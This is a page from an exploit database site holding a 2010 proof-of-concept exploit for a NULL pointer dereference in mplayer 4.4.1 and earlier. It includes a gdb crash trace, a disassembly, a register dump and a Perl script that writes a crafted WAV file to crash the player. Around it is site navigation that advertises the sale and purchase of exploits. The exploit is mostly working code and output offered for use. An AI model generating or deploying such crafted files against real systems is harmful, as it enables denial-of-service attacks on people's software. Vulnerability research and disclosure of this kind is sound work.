0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
mplayer <= 4.4.1 NULL pointer dereference exploit poc
[===================================================== mplayer <= 4.4.1 NULL pointer dereference exploit poc ===================================================== # Exploit Title: mplayer <= 4.4.1 NULL pointer dereference exploit poc 0 day # Date: 17/03/2010 # Author: Pietro Oliva # Software Link: # Version: <= 4.4.1 # Tested on: ubuntu 9.10 but should work in windows too # CVE : #Program received signal SIGSEGV, Segmentation fault. #0x081176d8 in af_calc_filter_multiplier () #(gdb) disas af_calc_filter_multiplier #Dump of assembler code for function af_calc_filter_multiplier: #0x081176d0 <af_calc_filter_multiplier+0>: push %ebp #0x081176d1 <af_calc_filter_multiplier+1>: mov %esp,%ebp #0x081176d3 <af_calc_filter_multiplier+3>: fld1 #0x081176d5 <af_calc_filter_multiplier+5>: mov 0x8(%ebp),%eax #0x081176d8 <af_calc_filter_multiplier+8>: mov (%eax),%eax ==> mplayer tries to dereference eax, which is a NULL pointer!!! #0x081176da <af_calc_filter_multiplier+10>: lea 0x0(%esi),%esi #0x081176e0 <af_calc_filter_multiplier+16>: fmull 0x28(%eax) #0x081176e3 <af_calc_filter_multiplier+19>: mov 0x18(%eax),%eax #0x081176e6 <af_calc_filter_multiplier+22>: test %eax,%eax #0x081176e8 <af_calc_filter_multiplier+24>: jne 0x81176e0 <af_calc_filter_multiplier+16> #0x081176ea <af_calc_filter_multiplier+26>: pop %ebp #0x081176eb <af_calc_filter_multiplier+27>: ret #End of assembler dump. # REGISTERS: #eax 0x0 0 ==========> NULL #ecx 0xfa157a57 -99255721 #edx 0x1fe0 8160 #ebx 0x8509a08 139500040 #esp 0xbfffe2e8 0xbfffe2e8 #ebp 0xbfffe2e8 0xbfffe2e8 #esi 0x7b84000 129515520 #edi 0xf8000 1015808 #eip 0x81176d8 0x81176d8 <af_calc_filter_multiplier+8> #eflags 0x10216 [ PF AF IF RF ] #cs 0x73 115 #ss 0x7b 123 #ds 0x7b 123 #es 0x7b 123 #fs 0x0 0 #gs 0x33 51 #!/usr/bin/perl print "[+] mplayer <= 4.4.1 NULL pointer dereference exploit poc 0 day by Pietro Oliva\n"; print "[+] pietroliva[at]gmail[dot]com http://olivapietro.altervista.org\n"; print "[+] creating crafted file mplayer.wav\n"; $buffer="\x52\x49\x46\x46\x1f\x04\x00\x00\x57\x41\x56\x45\x66\x6d\x74\x20\x10\x00\x00\x00\x01\x00\x1f"; open(file,"> mplayer.wav"); print(file $buffer); print "[+] done!\n"; # 0day.today [2024-11-15] #